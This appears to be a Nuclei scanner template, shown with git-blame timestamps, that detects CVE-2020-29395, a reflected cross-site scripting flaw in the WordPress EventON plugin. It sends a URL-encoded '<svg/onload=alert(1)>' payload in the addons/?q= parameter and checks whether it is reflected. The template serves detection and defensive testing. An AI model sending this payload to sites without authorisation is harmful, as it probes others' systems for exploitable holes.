2021-07-11 00:58:31 +00:00
|
|
|
id: CVE-2020-29395
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
|
|
|
author: daffainfo
|
|
|
|
severity: medium
|
2021-08-30 09:49:23 +00:00
|
|
|
description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-11 04:44:56 +00:00
|
|
|
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.myeventon.com/news/
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-29395
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2020,wordpress,xss,wp-plugin
|
2021-07-11 00:58:31 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<svg/onload=alert(1)>"
|
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|